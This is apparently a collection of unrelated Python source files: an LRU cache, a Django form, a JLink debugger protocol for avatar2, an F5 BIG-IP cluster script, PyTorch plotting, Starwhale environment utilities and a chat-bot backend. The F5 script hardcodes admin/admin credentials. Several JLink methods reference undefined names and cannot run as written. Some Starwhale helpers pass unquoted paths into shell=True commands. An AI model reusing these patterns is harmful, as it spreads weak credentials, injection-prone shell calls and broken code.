res_grids_final, _, _ = detector.extract_grids(im)
if res_grids_final is not None:
for (i, im_grid) in enumerate(res_grids_final):
cv2.imshow('grid_final_{}'.format(i), im_grid)
cv2.imwrite('images_test/grid_cut_{}.jpg'.format(i), im_grid)
cv2.waitKey()
|
115840
|
import threading
from collections import MutableMapping
from time import time
from .utils.cache_doublylinkedlist import DoublylinkedList
from .utils.cache_node import DoublylinkedListNode
from .utils.cache_thread import RLock
class LRUCache(MutableMapping):
"""Timed Least Recently Used (LRU) cache implementation.
TL;DR:
The timed LRUCache is a dict-like container that is also size limited.
It uses the prune method when instantiated with time to remove
time expired objects.
Timed LRUCache:
All objects on creation have a timestamp on it, this timestamp is used
to check for expired objects when a timeout is given,
the prune method is called and runs periodically in a thread
to do cleanups.
Items are kept in a dict but are also mutually linked to
each other in sequence of their last access time.
Access to single items, deletion, and update is done in constant time O(1)
The size limit, when exceeded will cause the oldest among the
not yet expired items to be kicked out of the cache.
Attributes:
cache: A python dict used to store key value pair.
lock: Thread safe RLock to access class methods.
timeout: Optional (Set time constraint).
maxSize: Set size of lrucache (Defaults to 1).
currentSize: Integer counter (Keeps track of lrucache size).
list_of_most_recent: Doublylinkedlist class instance.
timer: Used to periodically clear the cache when timeout is set.
"""
def __init__(self, maxSize, timeout=None):
self.cache = {}
self.lock = RLock()
self.timeout = timeout
self.maxSize = maxSize or 1
self.currentSize = 0
self.list_of_most_recent = DoublylinkedList()
self.timer = None
if self.timeout:
self._cleanup()
def __getitem__(self, key):
return self.get_value(key)
def __setitem__(self, key, value):
self.insert_key_value(key, value)
def __delitem__(self, key):
return self.delete_key(key)
# O(1) time | 0(1) space
def insert_key_value(self, key, value):
try:
self.lock.acquire()
if key not in self.cache:
if self.currentSize == self.maxSize:
self._evict_least_recent()
else:
self.currentSize += 1
self.cache[key] = DoublylinkedListNode(key, value)
else:
self._update_key(key, value)
self._update_most_recent(self.cache[key])
finally:
self.lock.release()
# O(1) time | 0(1) space
def get_value(self, key):
try:
self.lock.acquire()
if key not in self.cache:
return None
self._update_most_recent(self.cache[key])
return self.cache[key].value
finally:
self.lock.release()
# O(1) time | 0(1) space
def get_most_recent_key(self):
return self.list_of_most_recent.head.key
# O(1) time | 0(1) space
def delete_key(self, key):
try:
self.lock.acquire()
if key not in self.cache:
return None
else:
node = self.cache[key]
node.remove_bindings()
del self.cache[key]
self.currentSize -= 1
head = self.list_of_most_recent.head
tail = self.list_of_most_recent.tail
if head == tail:
self.list_of_most_recent.remove_tail()
finally:
self.lock.release()
# O(n) time | O(1) space
def _prune(self):
if not len(self.cache):
return
try:
self.lock.acquire()
outtime = time() - self.timeout
tail = self.list_of_most_recent.tail
while tail and tail.time_created < outtime:
self._evict_least_recent()
self.currentSize -= 1
tail = self.list_of_most_recent.tail
finally:
self.lock.release()
def _evict_least_recent(self):
key_to_remove = self.list_of_most_recent.tail.key
self.list_of_most_recent.remove_tail()
del self.cache[key_to_remove]
def _update_most_recent(self, node):
self.list_of_most_recent.set_head_to(node)
def _update_key(self, key, value):
if key not in self.cache:
raise Exception("The provided key is not in cache")
self.cache[key].value = value
def _cleanup(self):
self._prune()
timer = threading.Timer(self.timeout, self._cleanup)
timer.start()
self.timer = timer
def stop_timer(self):
self.timer.cancel()
def _contents(self, method, *args):
'''
common backend for methods:
keys, values, items, __len__, __contains__, __iter__
'''
try:
self.lock.acquire()
data = getattr(self.cache, method)(*args)
return data
finally:
self.lock.release()
def __contains__(self, key):
return self._contents('__contains__', key)
has_key = __contains__
def __len__(self):
return self._contents('__len__')
def __iter__(self):
return self._contents('__iter__')
def keys(self):
return self._contents('keys')
def values(self):
data = self._contents('values')
return [v.value for v in data]
def items(self):
data = self._contents('items')
return [(k, v.value) for k, v in data]
def __repr__(self):
d = dict(self.items())
classname = self.__class__.__name__
timeout = f'timeout={self.timeout}'
size = f'size={self.maxSize}'
data = f'data={repr(d)}'
return f'{classname}({timeout}, {size}, {data})'
|
115844
|
from django import forms
from .models import CartItem
class AddToCartForm(forms.ModelForm):
class Meta:
model = CartItem
fields = [
'quantity'
]
widgets = {
'quantity': forms.NumberInput(attrs={'class': 'full-width'})
}
|
115861
|
import sys
import pylink
from time import sleep
from threading import Thread, Event, Condition
import logging
import re
if sys.version_info < (3, 0):
import Queue as queue
# __class__ = instance.__class__
else:
import queue
from avatar2.archs.arm import ARM
from avatar2.targets import TargetStates
from avatar2.message import AvatarMessage, UpdateStateMessage, BreakpointHitMessage
class JLinkProtocol(Thread):
"""Main class for the JLink bprotocol, via pylink-square
:ivar serial: The serial number of the JLink to connect to
:ivar device: The JLink device name for the target
:ivar avatar: the avatar object
:ivar origin: the target utilizing this protocol
"""
def __init__(self, serial="12345678", device="ARM7", avatar=None, origin=None):
self._shutdown = Event()
self.avatar = avatar
self.origin = origin
self.jlink = pylink.JLink()
self.jlink.open(serial)
self.log = logging.getLogger('%s.%s' %
(origin.log.name, self.__class__.__name__)
) if origin else \
logging.getLogger(self.__class__.__name__)
Thread.__init__(self)
self.connect(device=device)
def __del__(self):
self.shutdown()
def connect(self, device="ARM7"):
# Todo add a time out here
while True:
try:
self.jlink.connect(device, verbose=True)
self.jlink.ir_len()
break
except pylink.errors.JLinkException:
self.log.info("Connection failed, trying again...")
sleep(0.25)
self.log.info("Connected to JLink target")
self.start()
return True
def reset(self, halt=True):
self.log.info("Resetting target")
return self.jlink.reset(halt=halt)
def shutdown(self):
self._shutdown.set()
def update_target_regs(self):
"""
This function will try to update the TargetRegs based on the list of
registers known to gdb.
"""
regs = {}
for idx in self.jlink.register_list():
name = self.jlink.register_name(idx)
regs[name] = idx
if hasattr(self.origin, 'regs'):
self.origin.regs._update(regs)
def run(self):
# Target state management thread
# This thread needs to poll for the halted state
# of the target
# JLink is lame and doesn't let you do this asynch
# Also, not all targets produce a "moe" (Mode of Entry)
# so we have to actually do that here.
try:
while not self._shutdown.is_set():
is_halted = self.jlink.halted()
if is_halted and self.origin.state == TargetStates.RUNNING:
# We just halted
# But did we hit a BP?
self.log.debug("JLink Target is halting...")
avatar_msg = UpdateStateMessage(self.origin, TargetStates.STOPPED)
self.avatar.fast_queue.put(avatar_msg)
self.origin.wait()
self.log.debug("JLink target has halted")
pc = self.get_pc()
if self.jlink.breakpoint_find(pc):
self.log.debug("JLink Target hit breakpoint %d" % self.jlink.breakpoint_find(pc))
avatar_msg = BreakpointHitMessage(self.origin, self.jlink.breakpoint_find(pc), pc)
self.avatar.queue.put(avatar_msg)
elif not is_halted and self.origin.state == TargetStates.STOPPED:
self.log.debug("About to resume target.")
avatar_msg = UpdateStateMessage(self.origin, TargetStates.RUNNING)
self.avatar.fast_queue.put(avatar_msg)
while self.origin.state != TargetStates.RUNNING:
pass
self.log.debug("JLink target has resumed")
except:
self.log.exception("JLink target errored")
finally:
self.log.info("JLink target exiting")
self.jlink.close()
def set_breakpoint(self, line,
hardware=False,
temporary=False,
regex=False,
condition=None,
ignore_count=0,
thread=0,
pending=False):
"""Inserts a breakpoint
:param bool hardware: Hardware breakpoint
:param bool temporary: Tempory breakpoint
:param str regex: If set, inserts breakpoints matching the regex
:param str condition: If set, inserts a breakpoint with specified condition
:param int ignore_count: Amount of times the bp should be ignored
:param int thread: Threadno in which this breakpoints should be added
:returns: The number of the breakpoint
"""
# TODO: Hw/Sw breakpoint control
self.log.info("Setting breakpoint at %#08x" % line)
ret = self.jlink.breakpoint_set(line)
self.log.info("Got BP ID %d" % ret)
return ret
def set_watchpoint(self, variable, write=True, read=False):
return self.jlink.watchpoint_set(variable, write=write, read=read)
def remove_breakpoint(self, bkpt):
"""Deletes a breakpoint"""
# TODO: Check this
return self.jlink.breakpoint_clear(bkpt)
def write_memory(self, address, wordsize, val, num_words=1, raw=False):
"""Writes memory
:param address: Address to write to
:param wordsize: the size of the write (1, 2, 4 or 8)
:param val: the written value
:type val: int if num_words == 1 and raw == False
list if num_words > 1 and raw == False
str or byte if raw == True
:param num_words: The amount of words to read
:param raw: Specifies whether to write in raw or word mode
:returns: True on success else False
"""
if raw:
new_val = []
if not len(val):
raise ValueError("val had zero length")
new_val = [ord(v) for v in val]
val = new_val
try:
self.jlink.memory_write(address, contents)
return True
except pylink.JLinkException:
return False
def read_memory(self, address, wordsize=4, num_words=1, raw=False):
"""reads memory
:param address: Address to write to
:param wordsize: the size of a read word (1, 2, 4 or 8)
:param num_words: the amount of read words
:param raw: Whether the read memory should be returned unprocessed
:return: The read memory
"""
ret = self.jlink.memory_read(address, num_units=num_words, nbits=wordsize)
if raw:
raw_mem = "".join([newint.to_bytes(i, length=int(math.ceil(i.bit_length() / 8.0))) for i in ret])
return raw_mem
return ret
def read_register(self, reg):
the_reg = tolower(reg)
the_idx = -1
for idx in self.jlink.register_list():
if the_reg == self.jlink.register_name(idx):
the_idx = idx
break
return self.register_read(the_idx)
def get_pc(self):
# Get PC a shitty way
for idx in self.jlink.register_list():
if "PC" in self.jlink.register_name(idx):
return self.jlink.register_read(idx)
def write_register(self, reg, val):
"""Set one register on the target
:returns: True on success"""
the_reg = tolower(reg)
the_idx = -1
for idx in self.jlink.register_list():
if the_reg == self.jlink.register_name(idx):
the_idx = idx
break
return self.jlink.register_write(the_idx, val)
def step(self):
"""Step one instruction on the target
:returns: True on success"""
return self.jlink.step()
def cont(self):
"""Continues the execution of the target
:returns: True on success"""
self.log.info("Resuming target...")
return self.jlink.restart()
def stop(self):
"""Stops execution of the target
:returns: True on success"""
self.log.info("Stopping target...")
return self.jlink.halt()
def set_endianness(self, endianness='little'):
if 'little' in endianness:
self.jlink.set_little_endian()
elif "big" in endianness:
self.jlink.set_big_endian()
|
115869
|
from f5.bigip import ManagementRoot
from f5.cluster.cluster_manager import ClusterManager
a = ManagementRoot('10.190.20.202', 'admin', 'admin')
b = ManagementRoot('10.190.20.203', 'admin', 'admin')
c = ManagementRoot('10.190.20.204', 'admin', 'admin')
cm = ClusterManager([a, b], 'testing_cluster', 'Common', 'sync-failover')
cm.teardown_cluster()
|
115887
|
import matplotlib.pyplot as plt
import numpy as np
import torch
weights = torch.load('RN_epoch_350.pth')
W = weights['rl.pool.weight'].cpu()
# filter out virtually-zero weights
# 20 pieces is too much for 12 set size, W[:, 1] and W[:, -2] are always 0
# So, we don't want to plot these because they are always approximately 0
W = W[W.norm(p=1, dim=1) > 1e-12]
x = torch.linspace(0, 1, W.size(1))
idx = list(range(W.size(1)))
idx.remove(1)
idx.remove(W.size(1) - 2)
W = W[:, idx]
x = x[idx]
for i, w in enumerate(W):
plt.subplot(10, 9, i + 1)
plt.axhline(y=0.0, color='k', linestyle='-', alpha=0.2)
plt.plot(x.numpy(), w.numpy())
plt.xticks([])
plt.yticks([])
plt.ylim(-1, 1)
plt.show()
|
115898
|
import os
import sys
import shutil
import typing as t
import tarfile
import platform
import subprocess
from pathlib import Path
import conda_pack
import virtualenv
from loguru import logger
from starwhale.utils import console, is_linux, is_darwin, is_windows
from starwhale.consts import (
ENV_VENV,
ENV_CONDA,
PythonRunEnv,
ENV_CONDA_PREFIX,
SW_PYPI_PKG_NAME,
DEFAULT_PYTHON_VERSION,
)
from starwhale.utils.fs import empty_dir, ensure_dir, ensure_file
from starwhale.utils.error import (
FormatError,
ExistedError,
NotFoundError,
NoSupportError,
PythonEnvironmentError,
)
from starwhale.utils.process import check_call
CONDA_ENV_TAR = "env.tar.gz"
DUMP_CONDA_ENV_FNAME = "env-lock.yaml"
DUMP_PIP_REQ_FNAME = "requirements-lock.txt"
DUMP_USER_PIP_REQ_FNAME = "requirements.txt"
SUPPORTED_PIP_REQ = [DUMP_USER_PIP_REQ_FNAME, "pip-req.txt", "pip3-req.txt"]
_DUMMY_FIELD = -1
class PythonVersionField(t.NamedTuple):
major: int = _DUMMY_FIELD
minor: int = _DUMMY_FIELD
micro: int = _DUMMY_FIELD
def conda_install_req(
req: t.Union[str, Path],
env_name: str = "",
prefix_path: t.Optional[Path] = None,
enable_pre: bool = False,
) -> None:
prefix_cmd = [get_conda_bin(), "run"]
if env_name:
prefix_cmd += ["--name", env_name]
elif prefix_path is not None:
prefix_cmd += ["--prefix", str(prefix_path.absolute())]
prefix_cmd += ["python3", "-m", "pip"]
_do_pip_install_req(prefix_cmd, req, enable_pre)
def _do_pip_install_req(
prefix_cmd: t.List[t.Any], req: t.Union[str, Path], enable_pre: bool = False
) -> None:
cmd = prefix_cmd + [
"install",
"--exists-action",
"w",
]
_env = os.environ
if _env.get("SW_PYPI_INDEX_URL"):
cmd += [
"--index-url",
_env["SW_PYPI_INDEX_URL"],
]
if _env.get("SW_PYPI_EXTRA_INDEX_URL"):
cmd += [
"--extra-index-url",
_env["SW_PYPI_EXTRA_INDEX_URL"],
]
if _env.get("SW_PYPI_TRUSTED_HOST"):
cmd += ["--trusted-host", _env["SW_PYPI_TRUSTED_HOST"]]
if enable_pre:
cmd += ["--pre"]
if isinstance(req, Path):
cmd += ["-r", str(req.absolute())]
elif os.path.isfile(req):
cmd += ["-r", req]
else:
cmd += [req]
check_call(cmd)
def venv_install_req(
venvdir: t.Union[str, Path], req: t.Union[str, Path], enable_pre: bool = False
) -> None:
venvdir = str(venvdir)
req = str(req)
prefix_cmd = [os.path.join(venvdir, "bin", "pip")]
_do_pip_install_req(prefix_cmd, req, enable_pre)
def venv_activate(venvdir: t.Union[str, Path]) -> None:
_fpath = Path(venvdir) / "bin" / "activate"
cmd = f"source {_fpath.absolute()}"
check_call(cmd, shell=True, executable="/bin/bash")
def parse_python_version(s: str) -> PythonVersionField:
s = s.strip().lower()
if not s:
raise FormatError("python version empty")
if s.startswith("python"):
s = s.split("python", 1)[-1]
_vt = s.split(".")
_major, _minor, _micro = int(_vt[0]), _DUMMY_FIELD, _DUMMY_FIELD
if len(_vt) >= 2:
_minor = int(_vt[1])
if len(_vt) >= 3:
_micro = int(_vt[2])
return PythonVersionField(major=_major, minor=_minor, micro=_micro)
def venv_setup(
venvdir: t.Union[str, Path],
python_version: str,
prompt: str = "",
clear: bool = False,
) -> None:
# TODO: define starwhale virtualenv.py
# TODO: use more elegant method to make venv portable
args = [str(venvdir)]
if prompt:
args += ["--prompt", prompt]
if python_version:
_v = parse_python_version(python_version)
args += ["--python", f"{_v.major}.{_v.minor}"]
if clear:
args += ["--clear"]
session = virtualenv.cli_run(args)
console.print(f":clap: create venv@{venvdir}, python:{session.interpreter.version}") # type: ignore
def pip_freeze(
py_env: str, path: t.Union[str, Path], include_editable: bool = False
) -> None:
# TODO: add cmd timeout and error log
_py_bin = get_user_runtime_python_bin(py_env)
logger.info(f"{_py_bin}: pip freeze")
cmd = [_py_bin, "-m", "pip", "freeze", "--require-virtualenv"]
if not include_editable:
cmd += ["--exclude-editable"]
cmd += [">", str(path)]
check_call(" ".join(cmd), shell=True)
def user_pip_install_pkg(py_env: str, pkg_name: str, enable_pre: bool = False) -> None:
_py_bin = get_user_runtime_python_bin(py_env)
cmd = [_py_bin, "-m", "pip", "install"]
if enable_pre:
cmd += ["--pre"]
cmd += [pkg_name]
check_call(cmd)
def check_python_interpreter_consistency(mode: str) -> t.Tuple[bool, str, str]:
if mode == PythonRunEnv.CONDA:
ep_base_prefix = os.environ.get(ENV_CONDA_PREFIX, "")
elif mode == PythonRunEnv.VENV:
ep_base_prefix = os.environ.get(ENV_VENV, "")
else:
ep_base_prefix = (
os.environ.get(ENV_VENV)
or os.environ.get(ENV_CONDA_PREFIX)
or sys.base_prefix
)
logger.debug(
f"current python interpreter base_prefix:{sys.base_prefix}, expected env base_prefix:{ep_base_prefix}"
)
_ok = ep_base_prefix == sys.base_prefix
if not _ok:
cur_version = f"{sys.version_info.major}.{sys.version_info.minor}"
user_version = get_user_python_version(mode)
if not user_version.startswith(cur_version):
logger.error(
f"swcli use python:{cur_version}, but runtime venv/conda python:{user_version}"
)
raise PythonEnvironmentError(
f"swcli({cur_version}), runtime({user_version})"
)
return _ok, sys.base_prefix, ep_base_prefix
def guess_current_py_env() -> str:
if is_venv():
return PythonRunEnv.VENV
elif is_conda():
return PythonRunEnv.CONDA
else:
return PythonRunEnv.SYSTEM
def get_user_python_sys_paths(py_env: str) -> t.List[str]:
logger.debug(f"get env({py_env}) sys path")
_py_bin = get_user_runtime_python_bin(py_env)
logger.info(f"{_py_bin}: sys.path")
output = subprocess.check_output(
[
_py_bin,
"-c",
"import sys; print(','.join(sys.path))",
]
)
return output.decode().strip().split(",")
def conda_create(
env: str,
python_version: str = DEFAULT_PYTHON_VERSION,
quiet: bool = False,
) -> None:
cmd = ["conda", "create", "--name", env, "--yes"]
if quiet:
cmd += ["--quiet"]
cmd += [f"python={python_version}"]
check_call(cmd)
def conda_export(path: t.Union[str, Path], env: str = "") -> None:
# TODO: add cmd timeout
cmd = f"{get_conda_bin()} env export"
env = f"-n {env}" if env else ""
check_call(f"{cmd} {env} > {path}", shell=True)
def conda_restore(
env_fpath: t.Union[str, Path], target_env: t.Union[str, Path]
) -> None:
cmd = f"{get_conda_bin()} env update --file {env_fpath} --prefix {target_env}"
check_call(cmd, shell=True)
def conda_activate(env: t.Union[str, Path]) -> None:
cmd = f"{get_conda_bin()} activate {env}"
check_call(cmd, shell=True)
def conda_activate_render(env_dir: Path, workdir: Path) -> None:
sw_cntr_content = """
_conda_hook="$(/opt/miniconda3/bin/conda shell.bash hook)"
cat >> /dev/stdout << EOF
$_conda_hook
conda activate /opt/starwhale/swmp/dep/conda/env
EOF
"""
host_content = f"""
echo 'conda activate {env_dir.absolute()}'
"""
_render_sw_activate(sw_cntr_content, host_content, workdir)
def venv_activate_render(
venvdir: t.Union[str, Path], workdir: Path, relocate: bool = False
) -> None:
bin = f"{venvdir}/bin"
host_content = f"""
echo 'source {venvdir}/bin/activate'
"""
if relocate:
# TODO: support relocatable editable python package
sw_cntr_content = f"""
sed -i '1d' {bin}/starwhale {bin}/sw {bin}/swcli {bin}/pip* {bin}/virtualenv
sed -i '1i\#!{bin}/python3' {bin}/starwhale {bin}/sw {bin}/swcli {bin}/pip* {bin}/virtualenv
sed -i 's#^VIRTUAL_ENV=.*$#VIRTUAL_ENV={venvdir}#g' {bin}/activate
rm -rf {bin}/python3
ln -s /usr/bin/python3 {bin}/python3
echo 'source {bin}/activate'
"""
else:
sw_cntr_content = host_content
_render_sw_activate(sw_cntr_content, host_content, workdir)
def _render_sw_activate(sw_cntr_content: str, host_content: str, workdir: Path) -> None:
_sw_path = workdir / "activate.sw"
_host_path = workdir / "activate.host"
ensure_file(_sw_path, sw_cntr_content, mode=0o755)
ensure_file(_host_path, host_content, mode=0o755)
console.print(
f" :clap: {_sw_path.name} and {_host_path.name} is generated at {workdir}"
)
console.print(" :compass: run cmd: ")
console.print(f" \t Docker Container: [bold red] $(sh {_sw_path}) [/]")
console.print(f" \t Host: [bold red] $(sh {_host_path}) [/]")
def get_conda_bin() -> str:
# TODO: add process cache
for _p in (
"/opt/miniconda3/bin/conda",
"/opt/anaconda3/bin/conda",
os.path.expanduser("~/miniconda3/bin/conda"),
os.path.expanduser("~/anaconda3/bin/conda"),
):
if os.path.exists(_p):
return _p
else:
return "conda"
def dump_python_dep_env(
dep_dir: t.Union[str, Path],
pip_req_fpath: str,
gen_all_bundles: bool = False,
expected_runtime: str = "",
mode: str = PythonRunEnv.AUTO,
include_editable: bool = False,
identity: str = "",
) -> t.Dict[str, t.Any]:
# TODO: smart dump python dep by starwhale sdk-api, pip ast analysis?
dep_dir = Path(dep_dir)
pr_env = get_python_run_env(mode)
sys_name = platform.system()
py_ver = get_user_python_version(pr_env)
validate_python_environment(mode, expected_runtime, identity)
validate_runtime_package_dep(mode)
_manifest = dict(
expected_mode=mode,
env=pr_env,
system=sys_name,
python=py_ver,
local_gen_env=False,
venv=dict(use=is_venv()),
conda=dict(use=is_conda()),
)
_conda_dir = dep_dir / "conda"
_python_dir = dep_dir / "python"
_venv_dir = _python_dir / "venv"
_pip_lock_req = _python_dir / DUMP_PIP_REQ_FNAME
_conda_lock_env = _conda_dir / DUMP_CONDA_ENV_FNAME
ensure_dir(_venv_dir)
ensure_dir(_conda_dir)
ensure_dir(_python_dir)
console.print(
f":dizzy: python{py_ver}@{pr_env}, os({sys_name}), include-editable({include_editable}), try to export environment..."
)
if os.path.exists(pip_req_fpath):
shutil.copyfile(pip_req_fpath, str(_python_dir / DUMP_USER_PIP_REQ_FNAME))
if pr_env == PythonRunEnv.CONDA:
if include_editable:
raise NoSupportError("conda cannot support export pip editable package")
logger.info(f"[info:dep]dump conda environment yaml: {_conda_lock_env}")
conda_export(_conda_lock_env)
elif pr_env == PythonRunEnv.VENV:
logger.info(f"[info:dep]dump pip-req with freeze: {_pip_lock_req}")
pip_freeze(pr_env, _pip_lock_req, include_editable)
else:
# TODO: add other env tools
logger.warning(
"detect use system python, swcli does not pip freeze, only use custom pip-req"
)
if is_windows() or is_darwin() or not gen_all_bundles:
# TODO: win/osx will produce env in controller agent with task
logger.info(f"[info:dep]{sys_name} will skip conda/venv dump or generate")
elif is_linux():
# TODO: more design local or remote build venv
# TODO: ignore some pkg when dump, like notebook?
_manifest["local_gen_env"] = True # type: ignore
if pr_env == PythonRunEnv.CONDA:
cenv = get_conda_env()
dest = str(_conda_dir / CONDA_ENV_TAR)
if not cenv:
raise Exception("cannot get conda env value")
# TODO: add env/env-name into model.yaml, user can set custom vars.
logger.info("[info:dep]try to pack conda...")
conda_pack.pack(
name=cenv,
force=True,
output=dest,
ignore_editable_packages=not include_editable,
)
logger.info(f"[info:dep]finish conda pack {dest})")
console.print(f":beer_mug: conda pack @ [underline]{dest}[/]")
else:
# TODO: tune venv create performance, use clone?
logger.info(f"[info:dep]build venv dir: {_venv_dir}")
venv_setup(_venv_dir, python_version=expected_runtime)
logger.info(
f"[info:dep]install pip freeze({_pip_lock_req}) to venv: {_venv_dir}"
)
venv_install_req(_venv_dir, _pip_lock_req)
if os.path.exists(pip_req_fpath):
logger.info(
f"[info:dep]install custom pip({pip_req_fpath}) to venv: {_venv_dir}"
)
# TODO: support ignore editable package
venv_install_req(_venv_dir, pip_req_fpath)
console.print(f":beer_mug: venv @ [underline]{_venv_dir}[/]")
else:
raise NoSupportError(f"no support {sys_name} system")
return _manifest
def detect_pip_req(workdir: t.Union[str, Path], fname: str = "") -> str:
workdir = Path(workdir)
if fname and (workdir / fname).exists():
return str(workdir / fname)
else:
for p in SUPPORTED_PIP_REQ:
if (workdir / p).exists():
return str(workdir / p)
else:
return ""
return ""
def activate_python_env(
mode: str,
identity: str,
) -> None:
# TODO: switch shell python environment directly
console.print(":cake: run command in shell :cake:")
if mode == PythonRunEnv.VENV:
cmd = f"source {identity}/bin/activate"
elif mode == PythonRunEnv.CONDA:
cmd = f"conda activate {identity}"
else:
raise NoSupportError(mode)
console.print(f"\t[red][blod]{cmd}")
def create_python_env(
mode: str,
name: str,
workdir: Path,
python_version: str = DEFAULT_PYTHON_VERSION,
force: bool = False,
) -> str:
if mode == PythonRunEnv.VENV:
venvdir = workdir / "venv"
if venvdir.exists() and not force:
raise ExistedError(str(venvdir))
logger.info(f"create venv @ {venvdir}...")
venv_setup(venvdir, python_version=python_version, prompt=name)
return str(venvdir.absolute())
elif mode == PythonRunEnv.CONDA:
logger.info(f"create conda {name}:{workdir}, use python {python_version}...")
conda_create(name, python_version)
return name
else:
raise NoSupportError(mode)
def get_user_python_version(py_env: str) -> str:
_py_bin = get_user_runtime_python_bin(py_env)
logger.info(f"{_py_bin}: python version")
output = subprocess.check_output(
[
_py_bin,
"-c",
"import sys; _v=sys.version_info;print(f'{_v.major}.{_v.minor}.{_v.micro}')",
]
)
return output.decode().strip()
def get_user_runtime_python_bin(py_env: str) -> str:
_prefix = get_base_prefix(py_env)
_py_bin = os.path.join(_prefix, "bin", "python3")
if not os.path.exists(_py_bin):
raise NotFoundError(_py_bin)
return _py_bin
def get_base_prefix(py_env: str) -> str:
if py_env == PythonRunEnv.VENV:
_path = os.environ.get(ENV_VENV, "")
elif py_env == PythonRunEnv.CONDA:
_path = os.environ.get(ENV_CONDA_PREFIX, "")
else:
_path = sys.prefix
if _path and os.path.exists(_path):
return _path
else:
raise NotFoundError(f"mode:{py_env}, base_prefix:{_path}")
def is_venv() -> bool:
# TODO: refactor for get external venv attr
output = subprocess.check_output(
[
"python3",
"-c",
"import sys; print(sys.prefix != (getattr(sys, 'base_prefix', None) or (getattr(sys, 'real_prefix', None) or sys.prefix)))", # noqa: E501
],
)
return "True" in output.decode() or get_venv_env() != ""
def get_venv_env() -> str:
return os.environ.get(ENV_VENV, "")
def is_conda() -> bool:
return get_conda_env() != "" and get_conda_env_prefix() != ""
def get_python_run_env(mode: str = PythonRunEnv.AUTO) -> str:
if mode == PythonRunEnv.VENV:
if is_venv():
return PythonRunEnv.VENV
else:
raise EnvironmentError(
"expected venv mode, but cannot find venv environment"
)
elif mode == PythonRunEnv.CONDA:
if is_conda():
return PythonRunEnv.CONDA
else:
raise EnvironmentError("expected conda mode, but cannot find conda envs")
elif mode == PythonRunEnv.AUTO:
if is_conda() and is_venv():
raise EnvironmentError("find venv and conda both activate")
if is_conda():
return PythonRunEnv.CONDA
elif is_venv():
return PythonRunEnv.VENV
else:
return PythonRunEnv.SYSTEM
else:
raise NoSupportError(f"python run env: {mode}")
def get_conda_env() -> str:
return os.environ.get(ENV_CONDA, "")
def get_conda_env_prefix() -> str:
return os.environ.get(ENV_CONDA_PREFIX, "")
def restore_python_env(
workdir: Path,
mode: str,
python_version: str,
local_gen_env: bool = False,
pip_req: str = "",
) -> None:
console.print(
f":bread: restore python:{python_version} {mode}@{workdir}, use local env data: {local_gen_env}"
)
_f = _do_restore_conda if mode == PythonRunEnv.CONDA else _do_restore_venv
_f(workdir, local_gen_env, python_version, pip_req)
def _do_restore_conda(
_workdir: Path,
_local_gen_env: bool,
_python_version: str,
_pip_req: str,
) -> None:
_conda_dir = _workdir / "dep" / "conda"
_tar_fpath = _conda_dir / CONDA_ENV_TAR
_env_dir = _conda_dir / "env"
_python_dir = _workdir / "dep" / "python"
if _local_gen_env and _tar_fpath.exists():
empty_dir(_env_dir)
ensure_dir(_env_dir)
logger.info(f"extract {_tar_fpath} ...")
with tarfile.open(str(_tar_fpath)) as f:
f.extractall(str(_env_dir))
venv_activate_render(_env_dir, _workdir)
else:
logger.info("restore conda env ...")
_env_yaml = _conda_dir / DUMP_CONDA_ENV_FNAME
conda_restore(_env_yaml, _env_dir)
_pip_req_path = _python_dir / _pip_req
if _pip_req_path.exists():
conda_install_req(req=_pip_req_path, prefix_path=_env_dir)
conda_activate_render(_env_dir, _workdir)
def _do_restore_venv(
_workdir: Path,
_local_gen_env: bool,
_python_version: str,
pip_req: str,
_rebuild: bool = False,
) -> None:
_python_dir = _workdir / "dep" / "python"
_venv_dir = _python_dir / "venv"
_relocate = True
if _rebuild or not _local_gen_env or not (_venv_dir / "bin" / "activate").exists():
logger.info(f"setup venv and pip install {_venv_dir}")
_relocate = False
venv_setup(_venv_dir, python_version=_python_version)
for _name in (DUMP_PIP_REQ_FNAME, pip_req):
_path = _python_dir / _name
if not _name or not _path.exists():
continue
logger.info(f"pip install {_path} ...")
venv_install_req(_venv_dir, _path)
venv_activate_render(_venv_dir, _workdir, relocate=_relocate)
def validate_runtime_package_dep(py_env: str) -> None:
_py_bin = get_user_runtime_python_bin(py_env)
logger.info(f"{_py_bin}: check {SW_PYPI_PKG_NAME} install")
cmd = [
_py_bin,
"-c",
f"import pkg_resources; pkg_resources.get_distribution('{SW_PYPI_PKG_NAME}')",
]
try:
check_call(cmd)
except subprocess.CalledProcessError:
console.print(
f":confused_face: Please install {SW_PYPI_PKG_NAME} in {py_env}, cmd:"
)
console.print(
f"\t :cookie: python3 -m pip install --pre {SW_PYPI_PKG_NAME} :cookie:"
)
raise
def validate_python_environment(mode: str, py_version: str, identity: str = "") -> None:
# TODO: add os platform check
current_py_env = get_python_run_env(mode)
current_py_version = get_user_python_version(current_py_env)
if py_version and not current_py_version.startswith(py_version):
raise EnvironmentError(
f"expected python({py_version}) is not equal to detected python({current_py_version})"
)
if current_py_env != mode:
raise EnvironmentError(
f"expected mode({mode}), detected mode({current_py_env})"
)
# TODO: add venv identity check
if mode == PythonRunEnv.CONDA and not identity:
conda_name = os.environ.get(ENV_CONDA, "")
if conda_name != identity:
raise EnvironmentError(
f"expected conda name({identity}), detected current conda name({conda_name})"
)
|
115910
|
from datetime import datetime
import json
import logging
from multiprocessing.queues import Empty
from multiprocessing import Process, Queue
import random
import re
import requests
import pickle
import sys
import time
import threading
import traceback
from sleekxmpp import ClientXMPP
from sleekxmpp.exceptions import IqError, IqTimeout
from .base import IOBackend
from will import settings
from will.utils import is_admin
from will.acl import is_acl_allowed
from will.abstractions import Event, Message, Person, Channel
from will.utils import Bunch, UNSURE_REPLIES, clean_for_pickling
from will.mixins import StorageMixin, PubSubMixin
ROOM_NOTIFICATION_URL = "https://%(server)s/v2/room/%(room_id)s/notification?auth_token=%(token)s"
ROOM_TOPIC_URL = "https://%(server)s/v2/room/%(room_id)s/topic?auth_token=%(token)s"
ROOM_URL = "https://%(server)s/v2/room/%(room_id)s/?auth_token=%(token)s"
SET_TOPIC_URL = "https://%(server)s/v2/room/%(room_id)s/topic?auth_token=%(token)s"
PRIVATE_MESSAGE_URL = "https://%(server)s/v2/user/%(user_id)s/message?auth_token=%(token)s"
USER_DETAILS_URL = "https://%(server)s/v2/user/%(user_id)s?auth_token=%(token)s"
ALL_USERS_URL = ("https://%(server)s/v2/user?auth_token=%(token)s&start-index"
"=%(start_index)s&max-results=%(max_results)s")
ALL_ROOMS_URL = ("https://%(server)s/v2/room?auth_token=%(token)s&start-index"
"=%(start_index)s&max-results=%(max_results)s&expand=items")
# From RoomsMixins
V1_TOKEN_URL = "https://%(server)s/v1/rooms/list?auth_token=%(token)s"
